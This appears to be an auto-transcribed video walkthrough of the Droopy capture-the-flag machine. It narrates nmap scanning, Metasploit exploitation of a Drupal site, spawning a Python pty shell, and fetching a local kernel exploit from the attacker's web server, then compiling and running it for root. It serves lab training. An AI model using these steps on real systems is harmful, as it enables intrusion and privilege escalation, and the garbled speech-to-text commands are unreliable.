Hello guys, welcome back to Pentesters Club. Today we're going to solve another CTF challenge name called Droopy. So what is the basic penetration testing methodologies we used here? So the basic penetration testing methodologies we used here: network discovery, enumeration, exploitation, privilege escalation, and capture the flag. So first open the terminal. Now what we would like to do here is you just type here as sudo su, enter your password, then you just type here net discover minus I is 0. So first we would like to identify our network hosting. So I identify my target machine is here. Then I'm just splitting now. You just type here as nmap minus t4 minus a is an address scan and enter your targeted IP address 102. So now let's wait for the nmap result. It's 101. It's fine. So I got the nmap result. One is available only with the Apache server. So let's see here. We would like to go with the targeted IP address 192.168. Yes, 168.0.102. So it was in the Drupal. So we can directly exploit the Drupal of this Drupal CMS website. Now we would like to come back here, file, new tab. So you just go with directly with MSF console. So now we would like to search this as Drupal Digger. So you just type here as search Drupal data. Now I would like to use the first one. You just type as use 0. You just type here as show options. So you just need to set up only the R host. So it's almost all everything is inbuilt. So you just type here as set R hostess, enter your targeted IP address 192.168.0.102. Then you just type here as exploit. Let's see here. Now we have got successfully exploited this one. So now you just type here as shell. You just type ID, you got it. So you just type here as which Python, you got it. Now we just type here as Python minus C, import pty span bin bash. Oh, sorry, I was enter wrong. So just type here as Python -c, and just enter as import pdy span bin bash. Now we would like to go for a cd home list -a cd gs guest user. Let's look anything else is available. So there is nothing else is available here. So now we just come back here as cd. Now what we would like to look here as, just look as this info. Okay, so I just we not get anything else, so I just type here as exit. Ready? So here also I would like to exit. Okay, uh, we just type clear. It's not working, so just look here as this info. So here I would like to look like Linux Droopy, so I just consider from here. So just copy this here, come back here. Now you just type here as exploit, then pasted this. So I would like to get this targeted exploit, so just copy. You just type here as exploit -m and paste it. Oh, sorry, put here. So I got you this, so you just type here a Python -m http dot server. Now we would like to go to here as a shell Python -c import a pdy span bin bash. Bash. Now just type here a cd a10. Now you get this a exploit 192.168.18. Oh, sorry, 0.101.28.000. This is the exploit. So just got it this, paste it. Now we just utilize here list -a. You just type here gcc, the exploit name, output as a shell. That was done. You give a permission chmod 777 shell. Now you just run this shell. Now I have successfully came to a root access, so you just type id, we are in the root, so you just type here cd root ls -al. That's it. There is no any type of flags. That's it. So you try it your own, guys. Thank you guys for watching and keep smiling.